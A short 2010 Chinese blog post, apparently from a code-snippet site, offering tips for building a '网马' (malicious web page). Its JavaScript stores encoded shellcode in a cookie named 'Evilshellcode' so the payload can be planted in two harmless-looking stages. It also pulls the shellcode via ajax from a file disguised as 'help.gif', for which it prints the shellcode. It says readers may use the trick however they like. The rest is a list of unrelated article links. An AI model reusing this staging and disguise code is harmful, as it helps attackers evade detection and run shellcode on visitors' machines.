一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
javascript使用数组的push方法完成快速排序
Sep 15 Javascript
jQuery中eq()方法用法实例
Jan 05 Javascript
js实现透明度渐变效果的方法
Apr 10 Javascript
JS中的eval 为什么加括号
Apr 13 Javascript
json的使用小结
Jun 08 Javascript
基于vuejs+webpack的日期选择插件
May 21 Javascript
很棒的一组js图片轮播特效
Jan 12 Javascript
react.js使用webpack搭配环境的入门教程
Aug 14 Javascript
JavaScript实现多重继承的方法分析
Jan 09 Javascript
Vue.JS实现垂直方向展开、收缩不定高度模块的JS组件
Jun 19 Javascript
微信小程序WebSocket实现聊天对话功能
Jul 06 Javascript
vue 获取元素额外生成的data-v-xxx操作
Sep 09 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
用PHP制作静态网站的模板框架(三)
2006/10/09 PHP
如何写php程序?
2006/12/08 PHP
Javascript自定义函数判断网站访问类型是PC还是移动终端
2014/01/10 Javascript
JS获取网页属性包括宽、高等等
2014/04/03 Javascript
如何用jquery控制表格奇偶行及活动行颜色
2014/04/20 Javascript
手机端网页点击链接触发自动拨打或保存电话的示例代码
2014/08/15 Javascript
javascript中一些util方法汇总
2015/06/10 Javascript
javascript html5移动端轻松实现文件上传
2020/03/27 Javascript
JQuery validate插件验证用户注册信息
2016/05/11 Javascript
JQuery 传送中文乱码问题的简单解决办法
2016/05/24 Javascript
JS变量中有var定义和无var定义的区别以及es6中let命令和const命令
2017/02/19 Javascript
javascript ES6 新增了let命令使用介绍
2017/07/07 Javascript
详解vue-cli构建项目反向代理配置
2017/09/07 Javascript
详解vue 实例方法和数据
2017/10/23 Javascript
浅谈vue引入css,less遇到的坑和解决方法
2018/01/20 Javascript
Bootstrap开发中Tab标签页切换图表显示问题的解决方法
2018/07/13 Javascript
详解Vue-cli3 项目在安卓低版本系统和IE上白屏问题解决
2019/04/14 Javascript
细述Javascript的加法运算符的具体使用
2019/10/18 Javascript
详解vue中使用axios对同一个接口连续请求导致返回数据混乱的问题
2019/11/06 Javascript
[02:28]PWL开团时刻DAY3——Ink Ice与DeMonsTer之间的勾心斗角
2020/11/03 DOTA
Python实现购物程序思路及代码
2017/07/24 Python
Python实现学校管理系统
2018/01/11 Python
Python 中list ,set,dict的大规模查找效率对比详解
2019/10/11 Python
Anaconda3+tensorflow2.0.0+PyCharm安装与环境搭建(图文)
2020/02/18 Python
Python中无限循环需要什么条件
2020/05/27 Python
python 基于opencv操作摄像头
2020/12/24 Python
CSS3制作翻转效果_动力节点Java学院整理
2017/07/11 HTML / CSS
HTML5适合的情人节礼物有纪念日期功能
2021/01/25 HTML / CSS
莫斯科珠宝厂官方网站:Miuz
2020/09/19 全球购物
财务会计实习报告体会
2013/12/20 职场文书
2014年迎新年联欢会活动策划方案
2014/02/26 职场文书
一年级数学下册复习计划
2015/01/17 职场文书
公司禁烟通知
2015/04/23 职场文书
2019财务转正述职报告
2019/06/27 职场文书
浅谈mysql增加索引不生效的几种情况
2021/06/23 MySQL
vue elementUI表格控制对应列
2022/04/13 Vue.js